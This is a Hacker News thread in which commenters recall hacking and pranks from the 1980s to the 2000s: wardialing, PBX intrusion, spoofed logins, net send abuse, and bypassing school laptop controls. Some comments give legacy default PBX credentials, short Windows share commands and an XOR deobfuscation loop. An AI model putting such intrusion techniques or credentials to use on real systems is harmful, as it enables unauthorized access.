[HN Gopher] Black Hat Exploits of the Stupid-Easy 80s ___________________________________________________________________ Black Hat Exploits of the Stupid-Easy 80s Author : mad_ned Score : 144 points Date : 2021-06-30 12:44 UTC (10 hours ago) (HTM) web link (madned.substack.com) (TXT) w3m dump (madned.substack.com) | pcdoodle wrote: | AOL | | Win32 API and VB6 Subclassing. Open random chatrooms, collect all | the screen names. Go to school. Computer dials AOL while parents | at work. Tries Screen Names as password. 3 attempts before AOL | Hangs up. Redials and tries next set of 3. Come home from school. | Fresh Screen Names. Free AOL. Terrorize Hanson Chat Room with | <font size = 9999999999999999> Instant Message. _Everyone has | left the chat_ | geocrasher wrote: | Early 90's Southern California. I was about 15 and had been | teaching myself Borland Turbo C++ at home with the SAMS book. At | school, there was a room in the Library with about 20 386sx/16's | that were used to teach kids... Borland TC++. The teacher? | Another student who was good at programming. I didn't know him, | but he had a reputation for being egotistical. My friend and I | just went in there at lunch to play QBasic games, which I'd | modify a bit for more fun. | | One day I decided to mess with the egotistical teen teacher. I | wrote a little TC++ program that ran from autoexec.bat. On | bootup, it put out several seconds of a low frequency buzz from | the PC speaker and then printed "Oh, Excuse me! I couldn't | contain myself!" and then disappeared. At that point, the | autoexec.bat removed the binary and then overwrite the old | autoexec.bat over itself, removing any proof. | | Nobody could say it was me, but the Librarian knew and said if I | did it again I wouldn't be able to go back. But she also said he | was really pissed by it and I get the feeling she got a kick out | of it, too. | JeremyReimer wrote: | You reminded me of a time in high school when I worked for the | local library. The librarian had a perverse habit of closing | the windows in the back room during the summer, making it | unbearably hot. My mother, who worked there full-time as the | Children's Librarian--the Librarian's direct subordinate--told | me that during winter this woman would open up the windows and | make everyone freeze. | | So while I worked on a program in FoxPro to automatically print | out new catalog cards, I also wrote a small program in | QuickBasic to print out (depending on the time of year) a | message saying "OPEN THE WINDOW!" or "CLOSE THE WINDOW!" (the | latter signed by "The Frozen Ghost") and then pause the | computer for a good minute or so just to make sure somebody | read it. | | For good measure, I made the AUTOEXEC.BAT file and my program | read-only, and then deleted ATTRIB.EXE from the hard disk so | that it would at least be somewhat annoying to remove. | | Years later I got a call from an IT tech who wanted to ask me | some questions about DOS (he never specifically said why!) and | I feigned ignorance. It felt good. | at_a_remove wrote: | I mean, there _was_ security, it 's just that most of the holes | were so big you could drive a bus through, honking and dragging a | bunch of rusty bikes. | | I have walked onto MUDs and, annoyed at being killed by some | wizard for saying "hi," (stupid n00b move on my part) figured out | how to bring the game to a screeching halt in about fifteen | minutes. They had to bring it all down and patch to make me go | away. This wasn't a testament to my ability, it's just that | nobody was _thinking_ about this stuff in a defensive way. | | Oh, your system won't let me email that file out, you'll just | return it to me? Well, lemme just forge my send from so you give | it to me anyway. | | I got up to a lot of horsing around, almost all of it non- | destructive because getting attention generally is not a great | thing and it wasn't my stuff, I just wanted to see what was out | there and you either had to hear about it from someone who knew | it already or you had to stumble across it. | BrandoElFollito wrote: | Early 90's, university. I tricked the administrator of the UNIX | cluster to "su" from my account. | | The su binary was mine, she typed the root password and the | cluster was mine. | | I went to the administrators to say that I cracked the system and | would like to be part of the administrators team. I was accepted. | | I learned an awful lot over the next few years (as a student, and | then as a PhD student) - this helped me to land a job at IBM, and | then at another company that was expanding in Europe. | a1369209993 wrote: | > I went to the administrators to say that I cracked the system | and would like to be part of the administrators team. I was | accepted. | | See, this? This is how school computer systems are supposed to | work. | ddingus wrote: | The 80's | | This piece brought a few memories and impressions forward. | | One was hacking ULTIMA 2 and 3. Copy protection involved the bad | sector technique. However, those programs did not do an in depth | error check. Atari machines made a beep on each disk sector read. | | To play a copy of the game, one just counted the beeps, open the | drive door, wait for the error sound (how handy is all that?), | then close the door and carry on. | | Chain smoking... all through primary and most of high school, the | teachers lounges were filled with tobacco smoke. To their credit, | the educators did not reek in class, well one did, but those | areas of the building did. | | All grades were old school analog, in the grade book, in pen. | Changes were done with a strike through, new value, initial. | | One of my peers wrote a book report program in BASIC that would | generate a fairly healthy set of variations. The seed was a wait | for input loop. Was double digit report success before there were | questions. | | Someone plugged an expansion card into a running Apple ][ | computer and killed it. Despite a dead CPU, it displayed video | anyway. Was my first real experience with simple hardware vs | custom chips. Those computers did not have the spiffy sprites, | colors and sounds the C64 and Atari machines had, but they did | have just enough of the things that really mattered when it came | down to getting real work done. Someone looked the machine over, | plugged in a replacement chip and it was running again. Nice. | | At the local university there was a card operated photo copy | machine. 5 cents a page or something like that. But, one could | ask for a copy, and listen for a little wine as some part began | to spin up, hit eject on the card and get a free page. | | Most locked doors in my primary school could be opened with just | hand manipulation of the doorknob. Turns out they were not | mounted in their recommended orientation. A gravity based attack | was possible and I found it one day bored just fiddling with the | knob. Turns out, the more I moved it, the more motion was | possible! | | Reporting that got me into trouble too. I remember that clearly! | | Of course they were angry at the doors being so easy, tried to | assign blame to me, a 6th grader, amd were more concerned about | the work and cost to fix the issue. | | If only people would just avoid doing anything unexpected, there | would not be a problem. In fact, there was not a problem, until | you came along... | | I remember looks on adult faces I did not see often when my | response was, "How would you know?" | | Some foreshadowing there for sure. | | Heck, I even did responsible disclosure. Took it right to them | first. Could have blabbed it to others and then what? | | Yeah, got the look again. | | One phone related one was super interesting too. A friend and I | took an old pulse dial phone apart and were kind of stunned to | see how simple it was. Then we made calls successfully without | the dialer, just slapping the handset hook with anything close to | the expected pulse rate. Cool. | | Then we called one another and were doing it again, just | interrupting one another. Soon, an operator was on the line | asking how we did this call. So we told her. | | Turns out we had dialed some test sequence or other. Of course it | was not published and was not intended for use doing an actual, | live call. Tech had to reset the whole thing, but we did get a | super cool tour of the system later as that same tech was happy | to show us how the robot like, electromechanical system worked. | Amazing. These trees of open circuits! When one dialed a number, | that number was an address that literally moved an rotated arms | that closed the circuit to connect the intended phones! | | Fun times. So much was human scale and could be directly seen, | heard, felt and was slow enough to be explored directly. | teknopaul wrote: | seems like bragging about is still the number one way to get | caught. | Bluecobra wrote: | > (Also worth mentioning: everyone's assigned password was their | social security number!) | | My student ID in college was my SSN, and that was only 20 years | ago. :( | tptacek wrote: | This is a fun post. It's sort of mind-blowing to think about in | the era of 15 page Project Zero posts about reverse engineering | nested AMD SVM virtualization control blocks, but throughout much | of the 1990s, the modal vector for an actual hacker taking over a | network --- any network --- was simply by mounting a world- | exposed NFS share. Leendert van Doorn's NFS shell was probably | the most important hacking tool of that entire decade. | mikewarot wrote: | I was a young CS student, and the VAX administrators had written | a program called SETUIC to work around some limitations on | hardware to allow business students access to an IBM mainframe. | | If you ran SETUIC with no parameters, it set your UIC to [0,0], | silently. _Anyone_ , not just business students, could run it. | The system environment variables pointed to it, like a big | advertisement sign to a young CS student. | | I learned many things about how the world works after | accidentally discovering this fact. It is fortunate for me that a | 2 year suspension was the extent of my punishment. They were | hopping mad, not at my actions, but at those who I was foolish | enough to share this knowledge with, and had acted far less | conservatively than I had. | | I later was a system administrator, elsewhere, for 15 years. | api wrote: | My friends and I "hacked" AT&T System 75 and similar PBX (intra- | office phone system) machines in the early 1990s for various | reasons, and they were easy to get into because they came loaded | with like 20 default admin accounts. | | I remember a few of these: "cust/custpw", "rcust/rcustpw", and | "craft/craftpw" come to mind. Almost nobody removed or changed | the password to these accounts. | | We'd find the machines using a "wardialer" (named after the phone | scanning scene in Wargames) app that would dial every number and | look for modems. We used a DOS scanner called "ToneLoc." We lived | in Cincinnati and could easily scan all kinds of local number | prefixes for free that overlapped with areas that were likely to | dredge up a rich PBX haul: downtown, near the airport, near | universities, etc. A certain kind of weird 1200-bps answer with | unusual parity settings (7E1 if I remember correctly) was a dead | giveaway for one of these ridiculously vulnerable AT&T PBX | machines. | | Once you got in you could pull pranks, set up remote access lines | to get "free" phone calls, set up party lines for you and your | friends, etc. | | I was like 14 or 15 at the time. | | We also found other "phun" things with our wardialer including | large outdoor signs with modems to allow remote configuration of | the text they would display. If you saw "SMOKE POT EVERY DAY" and | similar things a 15 year old would write on a highway or | advertising sign in Cincinnati in the early 1990s that was us. | | There was a real sense of exploration back then. When we scanned | areas like downtown Cincinnati we'd find tons and tons of modems | that would answer with mysterious (to us) prompts or blobs of | binary spew that I'm sure represented protocols we didn't know | how to emulate. A few times we managed to try obvious-sounding | login/password pairs on some of these login prompts and find | ourselves inside an Ultrix or a SunOS machine full of mysterious | data. We really didn't bother anything on those machines, just | looked around. We pulled pranks with things like signs but the | only things we really ever messed with or possibly damaged were | the PBXes. There were just too many fun things to do with those. | | The weirdest thing I remember finding was something that | initiated an Xmodem transfer and sent a black empty pixmap and | then hung up. I wonder if it was some kind of camera or | industrial monitor that was not actually working but was still | on. | | The most "alarming" thing we found was some kind of building | controller that we assumed belonged to a downtown skyscraper and | seemed to control elevators, which we didn't fuck with out of | concern that it could actually hurt people. Don't know if you | could have done anything dangerous with it but we didn't want to | try so we just dropped that one. | | There just wasn't a lot of security back then because it was all | new and very few people knew how to do what we were doing. Even | though Wargames popularized the idea of phone scanning people | still seemed to assume that a live modem on a phone line was | secure if the number was obscure. | | All that started changing really rapidly in the late 1990s when | tons of people got online. | | Edit: found the scanner! | | https://en.wikipedia.org/wiki/ToneLoc | | https://archive.org/details/20040130-bbs-mthreat | passwordreset wrote: | SWIM once said to me: Funny thing about those System 75's, the | entire ordeal originated from the hack of a bank's telephone | system, who had a small Unix UUCP network and, for some odd | reason, put all their System 75 logins and passwords into their | Systems file. The default login information leaked out after a | hacker named Syadasti announced that he was willing to turn any | System 75's given to him into usable remote PBXes, and | eventually some other hacker (Scott Simpson, maybe? don't know) | set up a system on his own home line that responded like a | System 75 would, and gave Syadasti that number. He promptly | tried to login with the cust/rcust accounts, which were | recorded by the other hacker, which led to the explosion of | System 75 hacks throughout the US. | tyingq wrote: | Shared computer labs were dead easy to scrape account info from. | Since the terminals were text, it was easy to code up a password | scraper. You write a program that faked the login and password | prompts, record the data, say "password incorrect", then exit, at | which point the real login daemon would take over. Cliff Stoll's | "The Cuckoo's Egg" describes this pretty well. | [deleted] | colordrops wrote: | The easiest exploit I can recall (late 80s? Early 90s?) was | getting credit card numbers from tossed receipts at gas station | pumps. | 29athrowaway wrote: | Initially there was no validation for credit cards. There were | programs called credit card generators that could generate a | card from any bank in the world, with any name on card, etc. | | If you wanted you could generate a card for McLovin from some | bank in Hawaii and it would work. | | I never used them but a close friend back in middle school did | and got his computer taken away permanently. | edmundsauto wrote: | This was a checksum that machines could run locally, to make | sure the account # was "valid". Then, in batch, systems would | connect to the bank for the account interaction. | | Some services (AOL, when it charged by the minute) wouldnt do | the actual bank reconciliation for a few days, during which | you could use the service. | bluedino wrote: | You could get the whole carbon from a counter at a department | store if the cashier wasn't around. | sgerenser wrote: | I worked at Sears selling TVs while in college from 2002-04, | and even in their latest POS systems anyone could walk up to | the thermal printer, press a button (even with the register | itself locked) and print out a reverse-chronological "journal | roll," which included names, addresses, phone numbers and | full credit card numbers and expiration dates for every | transaction. Crazy that anyone thought that was OK in the | early 2000s. | failwhaleshark wrote: | Before carbonless, the carbon slips between the layers. There | were up to 4 additional copies make on some of those kinds of | forms and you'd have to press very hard with a ballpoint pen in | order to get it to register at the bottom. Then, the credit | card imprinter had to press the card to get through them. | | Since most cards don't have raised numbers anymore, manual | credit card imprinting is no longer possible. | irscott wrote: | You used to be able to Google for transaction information from | a particular e commerce shopping cart and get .txts of credit | card info, name, address. The wild west was wild. | Trias11 wrote: | You could browse all files on many remote computers via: | | net use \\\123.45.6.78\ | | dir \\\123.45.6.78\ | spullara wrote: | I've been thinking about writing up a similar post focused on all | the dumb stuff that was possible in the 80s. Everything from | default voice mail passwords, long distance carriers with | predictable code patterns, office phone systems that tell you as | soon as you have a wrong digit for outside line access, DECs own | global asset management system having a huge security hole in it, | etc. Honestly though you can just read the first half of | Mitnick's book up until the point he starts breaking into actual | buildings to get a feel for it. Social engineering was and will | remain the most powerful tool in the hacking arsenal. | 300bps wrote: | _long distance carriers with predictable code patterns_ | | Thank god for statutes of limitations. Sorry MCI and Sprint for | getting about 20 codes per night with my 300 baud modem when I | was 13. | leifg wrote: | I still remember when Windows computers beging hooked up to a | dial up would be open on the internet. Lots of them had no admin | password and all drives where shared by default. | | So by just port scanning on the SMB port you'll find a lot of | computers and would have access to all their files. | arminiusreturns wrote: | Man I stumbled on some crazy stuff back then when doing scans, | one of the more notable was finding and ISP billing system with | it's C drive shared over netbios (137/138). It was such the | wild west days of the internet. | | Stuff like: I got in the local newpaper for recovering a county | server password that had been lost... cracks me up in | retrospect. | AnimalMuppet wrote: | With a cable modem, you were on the same physical cable as your | neighbors. If you looked at "Network Neighborhood", you would | see your neighbors' computers and printers (unless they had | turned off file and print sharing). | bluedino wrote: | Fire up Ettercap and read unencrypted AIM conversations... | thedougd wrote: | Ah yes, I had forgotten about this. Routers and access points | weren't yet a consumer item. | MeinBlutIstBlau wrote: | The typical 80's hack I always think of is in Ferris Buellers Day | Off where Ferris hacks the schools records to change the number | of days he was sick. Not only was there no internet, but how did | he connect to the network? It's something I've always wondered if | it would've even been possible. | kgwxd wrote: | He learned a lot while hacking the WOPR. | pjmlp wrote: | Here are modems for Timex 2068, | https://www.timexsinclair.com/products/hardware/rs232-serial... | mad_ned wrote: | possible, maybe not likely. our school for instance had a modem | line you could dial into, that let you access this one program | that was for career counseling, it was like a buzzfeed quiz | that asked you questions, and then recommended a career for | you. I think I got plumber. we tried to hack past this to get | at the general OS, but no luck. I suppose someone could set | something like that up for the school record access, but would | they? (like I claim in the article, it was the 80s so maybe) | dave_sullivan wrote: | I had a project one time for a school district and had access | to all of that. Made me think of the "changing grades remotely" | trope and had a pretty good chuckle. Wouldn't have been | possible when I was a kid but it is now I guess. | bluedino wrote: | Early 90's, but our computer system (some sort of minicomputer) | had a modem bank so that teachers could do grades and such from | home. I worked in the office because I had an open hour, I | earned a credit and I also got to see the guidance counselors | view students records and such. It would have been very, very | easy to change grades. | | Also, many schools had internet connections back then. I know | our school had a T1, it might have also had a leased line to | the state education system for some reason, I would guess the | security was very lax back then. | dragontamer wrote: | > Not only was there no internet, but how did he connect to the | network? | | Most "networks" were over phone lines those days. | | You call in with a modem, and that connects you into a | particular computer (or in the general case: a network). BBS | for example was just a shared computer on a modem on a well- | known publicly posted telephone number that many people called | every now and then to check for message. | | If you knew the correct telephone numbers and the proper | parameters to connect (baud rate, modem type, etc. etc.), you | could even get a printer (aka: Fax Machine), a UNIX login | prompt, or other equipment inside of an office (and presumably | a school). | | ---- | | Now why would a school put their grades database on a publicly | facing telephone number and hope it doesn't get hacked? Well, | that's a good question. | | But then again, ATM machines in tiny liquor stores are still | largely on this telephone-line / modem technology (I dunno if | its still like this today, but even just 10 years ago, a | surprising number of ATM machines were still accessible over | dial up). So why don't you ask the ATM machine engineers why | they think that this practice is safe. | | After all, if its safe enough for ATMs, its probably safe | enough for a school network. If this thought process is | horrifying to you, then welcome to the 80s / 90s era of | computer security. | kQq9oHeAz6wLLS wrote: | > Now why would a school put their grades database on a | publicly facing telephone number and hope it doesn't get | hacked? | | Same folks who built David Lightman's school system, | apparently. | goalieca wrote: | My high school had the attendance computer in main office and | it could be found on the network from any other machine. | Everyone knew the password to it since was used and shared | for all other admin and IT tasks. | kmeisthax wrote: | This concept is a little weird to think about today, but the | Internet used to be accessed through regular voice phone lines. | You'd plug your computer into the phone network with a little | thing called a modem. In the _really_ early days you actually | had to use an acoustic coupler for regulatory reasons. Then you | dialed the phone number of the computer you wanted to connect | to - most of which were _not_ running the Internet Protocol! | | Typical computer systems you would dial into would include... | | 1. Proprietary data services (AOL, Compuserve, etc) | | 2. BBS systems - typically individual computers running | services that let you send messages or files to other users who | could then dial in to receive them. Some BBSes were even | networked to one another, the largest of such systems being | Fidonet | | 3. Remotely-managed IT equipment - the sort of thing depicted | in the movie. | | 4. Mainframes - universities and large businesses would often | have remote access that you'd dial into. This is roughly | equivalent to SSHing into an Internet-connected machine today. | | 5. The Internet - originally only through remote access to | mainframes (#4). Later on, data services (#1) started offering | open Internet access. (notoriously, AOL utterly demolished | USENET's existing cultural norms by doing this) Then companies | started just selling dial-in Internet access without other | services and this became the dominant use case for modems. | | This concept was inverted starting in the late 90s. First, | phone companies started offering "digital subscriber lines" | (DSL) that provided way more bandwidth to connect to an ISP | with. Then, (at least in North America, thanks to various Sega | Genesis related reasons) cable companies got in on this and | started offering "broadband Internet", too. With the greater | bandwidth of these services, it suddenly made sense to send | Voice over Internet Protocol (VoIP) instead of Internet | Protocol over Voice. So dedicated landline channels became very | outdated _very quickly_ , and today we think of voice as just | something you send over a multitude of Internet apps. | bluedino wrote: | Don't forget about your dialing into your office computer to | work from home, using something like LapLink or PC Anywhere | CountDrewku wrote: | Watch War Games and that'll give you a general overview of how | you'd access a system back in the 80s. They were still | networked and accessible remotely, just not the way they are | today. | ulzeraj wrote: | Very cool stories. I remember running some pranks but those are | all from the early 2000s. | | Best story I remember there was this arrogant guy that worked | with on the Unix department. He was into FreeBSD by that time and | had an attitude towards the Linux guys. One day he left his table | and forgot his machine open with a root prompt. They took the | chance and modified inetd.conf to map a certain port to the | shutdown program. People had so much fun shutting down his | computer remotely and watching his reaction. | | There was also this time working for a smaller company and we | would prank each other all the time. I had admin access to the | Linux router so I've created a NAT rule to redirect this guy's | traffic to a transparent squid proxy running a perl script that | relied on imagemagik to turn the images upside down. Got the | script from a Slashdot post. Poor guy even tried to reinstall the | OS to no avail. He eventually found out and had his revenge by | going into my computer CMOS and setting disk access to PIO | instead of DMA. | | I also remember scaring people through Windows' net send commands | and that one where you take a screenshot of the desktop then you | remove all the icons and interface bars and set the screenshot as | background image. Also randomly adding 'alias ls=exit' to some | server /etc/profile. | jonshariat wrote: | Not a programmer but lots of good memories doing the background | trick by hand. Good times. | 29athrowaway wrote: | A highly recommended text file, enjoy: | | Anatomy of a pirate | | http://www.textfiles.com/piracy/anatomy.txt | tobinfricke wrote: | When the web was new, one could use Altavista to search for | /etc/passwd files accidentally exposed to the web, and crack | them. Even better, many *nix machines shipped with some accounts | having no password by default. I remember one could easily telnet | into almost any SGI Irix machine via the "lp" account. | jamal-kumar wrote: | Back in the mid-2000s I was really into computer security (still | am) and managed to trick my school's truancy system using | something called a silent termination test line. Basically what | this does is cuts out the line entirely to test for line noise | for a few minutes, like you pick up the phone and it'll still be | connected to that number, no dial tone just silence. I just | confidently went right up to the secretary and told her my new | home phone number was the silent termination test line. There | would be this automated truancy bot calling everyone but whenever | it would reach my name, skipping around a class a day at one | point (Still don't know how I actually graduated other than the | teachers liking me and getting my homework done anyways), it | would just fuck the entire system up and a bunch of people | wouldn't get calls after me either. | | Smoking drugs and hanging out with girls was way funner, | completely zero regrets getting doing stuff like that out of my | system early... considering the trajectory my life has been on I | really didn't need post secondary. Can only imagine how stressful | and expensive that would have been and to what depressing, | indebted end. | | There was a bunch of other fun stuff on that test prefix, but | half of that is lost to the sands of time, the funnest I don't | even know what the hell it was. I've asked random phone company | linemen about it and they're basically just like "how the hell do | you even know anything about this?", and can't tell me what this | number I found was. I basically war-dialed it based on patterns | from other numbers on the prefix and it'd give me 30 seconds and | then a real dial tone (payphones around then actually used some | recorded tone). Since I could call these numbers for free from | the school payphone, it was easy to find, and that real dial tone | was probably in the phone company HQ. We found this enormous list | of interesting phone numbers from phonelosers.org (Wish those | were archived!) and just started doing shit like calling the | white house and the president of kenya's office. I think we only | stopped after a friend of mine made a huge stupid mistake and | tried to print the list out. The library printer just started | spitting out REAMS of paper, the librarian was like what the hell | and I just remember thinking damn he fucked up, and running away | hahaha | techrat wrote: | Web archive goes back to 1997... | | http://web.archive.org/web/19990125102138/http://www.phonelo... | jamal-kumar wrote: | I don't know if I have time to dig through all of that with | th interspersed broken links but I am pretty sure it was on | phonelosers.com which was their forum | | Still thanks for the link I haven't seen this in ages | | I think RBCP went to jail at some point | | The closest thing I can find on google is a really old | version from 1995: | http://www.textfiles.com/groups/PHONELOSERS/pla007.txt But | the thing got HUGE over like a decade | thedougd wrote: | Some fun ones: | | BBS games started adding virtual currency that you could transfer | between players. Some even participated in a network of BBS | systems, allowing the movement of game currency from one BBS to | another. These frequently didn't have input validation and you | could transfer -1 to another player and they'd receive 4294967296 | dollars. Unfortunately we were kids and kids do nasty things. We | would completely upend a competitive game by giving all the | underdogs huge wealth. | | Pager numbers all fell in the same exchanges. Every number under | 123-456-xxxx would be a pager. I wrote a program to war dial all | these and leave the same victim's phone number on all the pagers. | We did it to a friend and witnessed an endless stream of | frustrated calls to their house for a few hours. Brutal. | | A school system put their mechanical control systems on a modem. | We acquired the software and directory that could access these | control systems. Not only did they put all the HVAC systems on | it, they also added things like emergency and off-hour lighting. | Some of the stuff that was controllable through this remote | interface was down right scary: boiler pressure measurements, | boiler system valves, etc. We weren't stupid enough to mess with | that but would have fun turning off all the lights at night, or | turning up the heat before the Saturday morning recreation | basketball games in the gym. | brk wrote: | I remember using odd/unprintable characters in those BBS games | for my username. There was one (spacewars?) where you got a | bounty, but had to type in the characters name to claim the | bounty, people would complain they could not collect the bounty | against me, as my name was basically brk[null character]. | reid wrote: | My high school in 2003 used IBM PCs with Windows NT. I discovered | the Messenger service, enabled by default, remained enabled and | was not turned off by group policy. | | Start > Run, type "cmd", then: net send B131 | "Hi there" | | This would pop up "Hi there" on the B131 computer. The hostname | of each computer (B131, for example) was taped to the top of each | monitor, so I had a great time annoying my classmates in computer | lab. One day students around me noticed me doing this and I | naively showed them how to do it. I helpfully suggested to | _never_ type * as the hostname or the message would send to all | computers. | | After a school wide DDoS from several students around me sending | messages over and over like: net send * "this | school is the worst" | | ...and a lot more unmentionable messages, I was soon escorted out | for a three day suspension for "hacking the school network." Good | times. :) | jamal-kumar wrote: | heh I remember doing a little bat file that was something like | @echo off net use e: \\Network\Share | | to get to the network shares which I could see in windows | 2000's network display but would just tell you 'access denied' | if you tried to simply click on them. Just giving them a drive | mount like that worked fucking swimmingly. It gave us access to | pretty much everything, including this program called | 'photodex' where the username and password was the first | initial of our principal's first name and his last name and the | password was 'teacher'. Some other kid figured this out at some | point before us, and we found a folder containing bunch of shit | with super obvious file names like TEENPORN.JPG.EXE and the kid | we didn't really like in our IT class who turned out to be a | registered sex offender as an adult (he told me this at a | wedding after complaining that they took his guns away, and all | i could do was remember this incident and laugh) actually went | and clicked one of these because he was a bit thick in general, | and ended up getting in shit for this. I don't remember if they | managed to lock things down properly after that but I think I | remember recalling that this ruined the fun. | peter_l_downs wrote: | Great writing. I never did anything so interesting, but I have a | few fun stories from highschool. Our school district gave every | student access to a mac laptop for coursework, but of course we | used to play a lot of flash games. Eventually they got around to | updating the network's blocklist or whatever so addictinggames | couldn't be accessed anymore. I'm sure they thought they were | very smart but this just raised the stakes. | | Of course we couldn't install games or our own software on the | computers -- the `/Applications` folder was locked down and | nothing would execute outside of it. They weren't totally stupid, | they had some remote monitoring and privilege blocking software | to prevent us from getting control of our own machines and doing | silly things like playing games or even opening the Terminal. But | eventually someone (not me, really, I wish I were this smart) | figured out that inside of one of the pre-installed .app's there | was a directory to which users still had write permission. So | everyone in the entire school started playing Marble Blast Gold | and, for some reason, Pokemon Red through an emulator, all just | by dropping the programs inside the special fold | `/Applications/SomeThingICantRemember.app/contents/special- | folder/`. The games spread like wildfire because the school had | also set up a system of shared network folders, one for each | teacher, so that teachers could more easily share files with us. | Turns out we could also use it to share files with each other. | Lots of movies, as well. Eventually someone noticed and shut that | all down. | | Of course, highschool students want to play games instead of | doing coursework, so one day someone (not me, really) realized | that if you removed the battery from the laptop you could then | unscrew the case and remove a stick of RAM, which would allow you | to hold certain keys at boot to reset the PRAM or something like | that. This would let you boot into safe mode, circumventing the | remote monitoring and permissions software they had in place, and | make your user account an administrator. Boom, games were back. I | mostly used it to be able to work on software projects, of | course, but I did end up playing a bit of Advance Wars. | | I can't remember now but there was some issue where this didn't | persist for very long -- maybe there were updates that the remote | monitoring system would send that would reset your admin status? | -- so you would have to go through the whole PRAM reset | rigamarole, with a screwdriver, and that was a pain in the ass. I | was out of school for a while my senior spring due to the flu and | I figured out a way to totally disable the remote management | software. | | This was great, and I was having an awesome time working on | software that would eventually get me my first programming job | while I should have been focusing in class, when I got called | down to the principal's office, where I was accused of being a | computer hacker. I of course denied it, but they said that it | certainly was odd that my computer had stopped communicating with | the remote management software entirely. I think because I was so | close to graduating and actually hadn't done anything wrong I got | away with a week of detention and a firm promise to not do | anything of the sort ever again. | | Around that same time it had come out that certain administrators | at the school were misusing the remote management software's | features to spy on highschool students in their own homes, which | was pretty absurd and of course a huge and expensive debacle, so | I think they were somewhat more sympathetic to me disabling it | than they might have been otherwise. | | https://en.wikipedia.org/wiki/Robbins_v._Lower_Merion_School... | peter_l_downs wrote: | Oh, one other fun thing. We had a schoolday that ended with a | 30 minute activity period where every student had to sign up on | some web interface to a different teacher's room. This was so | that you could get help, meet with teachers, project groups, | whatever if you needed it. But there were limited spots in each | teacher's periods and you needed to sign up in advance, with no | more signups allowed after noon on the same day. I took a look | at the web interface and realized that all the checks were | client-side, so I wrote a little script that would let me sign | up for any activity period, at any time, even during the | activity periods. It was good fun being able to switch periods | at the end of the day, and seeing teachers being confused after | they had called attendance, checked me in to their room, and | then seeing me drop off the attendance and show up somewhere | else. Gave me a free pass to go wherever I wanted which was | nice. | Pick-A-Hill2019 wrote: | I took a look at that link (Robbins v. Lower Merion School | District) and - Wow, remotely activating students webcams in | their own bedrooms is ... just ... SMH. I hope I am wrong but | as far as I can tell, no-one went to jail for it?? Dayamn! | __MatrixMan__ wrote: | In my middle school you could just x out of the Windows NT login | window and get a userless session. | | We didn't understand that we hadn't hacked anything, and neither | did our teachers. Their misplaced awe at our ability to cloak our | activities in anonymity was intoxicating. | | Most of my cohort then are engineers now. | | I worry that as security gets better, opportunities for | creativity and exploration go away, which might not bode well for | future generations. | tester756 wrote: | Don't worry | | If you're into real world security / reverse engineering and | other stuff, then try CTFs, other strong people will ensure | that you'll have enough room for creativity and hacky hacks :) | jamal-kumar wrote: | I think about this alot too. Tons of the current tutorials on | learning how to break windows security teach you on an old | windows 7 VM just to make it easy to get around mitigations and | learn without hindrance. I mean I know I learned on windows XP | VMs... but what happens when Microsoft rescinds offering those | free windows 7 IE11 VMs any arbitrary time soon? | | On the other hand I like how Microsoft actually seems to be | giving a damn these days. | grawprog wrote: | In university, for some strange reason, we were required to | spend a few hours in a 'learn how to use a search engine | class.' It was brutal, they used remote control software and | slowly and painfully taught us how to use google. | | I figured out pretty quickly you could Ctrl-alt-delete to bring | up the task manager and just close the client on the computer I | was using. | | The teacher never figured out why one of the computers vanished | off the remote software management screen she was using. | nogridbag wrote: | Yeah I also got a bit too creative in middle and high school. | It was all harmless fun, e.g. writing scripts so that various | computers would start beeping at random times during the day. | | None of my school faculty had any understanding of computers. I | was even yelled at for using "Google" during a research | project. | | I think the bigger fear is that people cannot make mistakes | anymore. Even in my local town a simple mistake went viral on | social media and now the student's whole life is ruined for | something that may have been a simple visit to the principle's | office back in the day. | liketochill wrote: | I did a school project where I dos'd a local ISP for 10 seconds | using broadcast amplifiers on misconfigured routers that | allowed the source address to be spoofed. I was probably 15? | The isp I think only had a T3 but most people were still on | dial up so overwhelming a T3 seemed like a big deal. | | I miss having shell accounts at all the .edu's for my egg drop | bots. That is how I learned about all the us schools hah | twox2 wrote: | It's a moving target. The opportunities for kids to get | creative and explore are now in emerging technologies, but they | are "emerging" only to us old farts. To young people, it's just | what's there. I think these things come easy to the inquisitive | minds that are not tainted by what you can and can't. | | For example, I often read bug bounty write-ups, many of which | are obviously written by young teenagers. Some of them are able | to find issues that appear to be hiding in plain site. I kind | of think that what you're describing is a matter of | perspective, but boy do I miss the good old days when | everything was easy to exploit. | Zenst wrote: | My earlier hack was a ICL 2903 running George OS, involved | creating large file in area previously used for system journal | and could then dump that file out and read the content of the | system journal and that was how I got the admin password. Other | one I did was in effect a keylogger that I ran on the system that | would take control of the terminal it was directed too and | present login, take the input and then pass to the system making | the user oblivious. | | But for practical use, the old 0800 free calls trick of the early | 80's was probably most favourite. Back then they introduced 0800 | free calls, when landline calls in the UK wasn't cheap. These got | used for marketing, so companies would have there 0800 sales etc. | Now, outside office hours they would direct to a recorded message | on the PBX. Then what you could do is after the message, if you | stayed on the line it would drop you into the exchange and you | then pressed 9 on tone dial pad and could dial any number you | likes as if you was dialling from that exchange location. Most | being in London so was nice for free calls. Had limited use for | BBS access, case of all that routing and line quality at times as | well initial set-up. But still fun. | fatnoah wrote: | It wasn't just the '80s. Things persisted into the mid '90s as | well. - Pirate FTP sites were in plain sight with | folders named with unprintable ASCII characters - My | college-provided Telnet client for Windows included a backdoor | FTP server with a plaintext user name and easily brute-forced | password (unsalted hash that turned out to be a birthday of a | school admin) - Admins had to resolve our network issues by | connecting to network via modem, from our computers. Of course | terminal program had keylogging enabled... - Open SMTP | relay was widespread and everywhere. Spoofing and forging was as | easy as a little Telnet and HELO | flatiron wrote: | 90s I got suspended for "hacking" when all I did was create a | windows file share. Had me and my friends split the typing | assignments and combine them on the share so we could browse the | internet during typing class. | pdkl95 wrote: | In high school "AP CS" class in the early 90s, a friend of mine | was annoyed at the stupid "security" software the school | installed on the macs (system 7). It was basically just a system | extension that asked for a password on startup. | | Poking around, my friend noticed a slightly hidden/obscured file | that had a file size that matched the number of characters in the | password. N char password, N byte file. The file didn't have the | password in plaintext, so my friend asked the teacher of a common | way to scramble a byte. The teacher quickly suggested, "XOR?" | | So my friend decided to try XORing the bytes in the file with a | few values to see what happend. His _first guess_ was right: the | password was "obscured" with: for (char *p = | password_str; p != NULL; p++) { *p ^= 0xC9; } | | Why did he guess 0xC9? He was a total Trekkie/Trekker. 0xC9 in | binary is 11001001. | | https://memory-alpha.fandom.com/wiki/11001001_%28episode%29 | | I guess we know what show the author of the "security software" | likes to watch... | | Epilogue: my friend quickly did the obvious thing and made a boot | floppy with a small program that printed out the password, so we | had access to most of the computer in the school 